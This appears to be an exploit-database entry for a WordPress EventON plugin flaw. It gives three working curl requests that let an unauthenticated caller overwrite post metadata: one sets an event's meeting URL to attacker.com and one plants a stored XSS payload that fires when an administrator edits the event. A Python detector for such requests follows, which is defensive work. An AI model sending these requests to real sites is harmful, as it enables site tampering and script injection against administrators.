## https://sploitus.com/exploit?id=WPEX-ID:774655AC-B201-4D9F-8790-9EFF8564BC91
To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240:

curl -X POST --data "eid=240&values[_vir_url]=https://attacker.com/" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta'

To set the my_meta metadata (if it does not exist, it will be created as a custom field) to attacker on the post with ID 20:

curl -X POST --data "eid=20&values[my_meta]=attacker" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta'

This can lead to Stored XSS in Free < 2.7.7 and Premium <= 4.5.4:

curl -X POST --data 'eid=240&values[_evcal_ec_f1a1_cus]=" style=animation-name:rotation onanimationstart=alert(/XSS/)//' 'https://example.com/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta'

The XSS is triggered when an admin edits the event in the backend.
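For detection, the requests above share a recognizable shape: a call to admin-ajax.php with the `eventon_eventpost_update_meta` action, an `eid` post ID and one or more `values[...]` meta fields. The following is an added example, not code from the advisory or the plugin; the function name `inspect_request`, the `MARKUP` heuristic and the sample traffic are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

ACTION = "eventon_eventpost_update_meta"      # AJAX action named on this page
META_KEY = re.compile(r"^values\[([^\]]*)\]$")  # values[<meta key>] form fields
# Assumed heuristic: characters that let a stored value leave an HTML attribute.
MARKUP = re.compile(r"""["'<>]|\bon\w+\s*=""", re.I)

def inspect_request(method, url, body=""):
    """Return None unless the request targets ACTION, else a finding dict."""
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qsl(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        # admin-ajax.php reads the action from $_REQUEST, so check the body too.
        params += parse_qsl(body, keep_blank_values=True)
    if ("action", ACTION) not in params:
        return None
    finding = {"post_id": None, "meta_keys": [], "markup_keys": []}
    for name, value in params:
        if name == "eid":
            finding["post_id"] = value
        match = META_KEY.match(name)
        if match:
            finding["meta_keys"].append(match.group(1))
            if MARKUP.search(value):
                finding["markup_keys"].append(match.group(1))
    return finding

# Constructed sample traffic: (method, URL, body). Hosts are placeholders.
AJAX = "https://example.com/wp-admin/admin-ajax.php"
SAMPLES = [
    ("POST", AJAX + "?action=" + ACTION, "eid=240&values[_vir_url]=https://attacker.com/"),
    ("POST", AJAX, "action=" + ACTION + "&eid=20&values[my_meta]=attacker"),
    ("POST", AJAX + "?action=heartbeat", "interval=60"),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, url, "->", inspect_request(method, url, body))
```

Access logs that record only the URL will miss requests that carry the action in the POST body, so this check belongs where request bodies are visible, such as a WAF or reverse proxy.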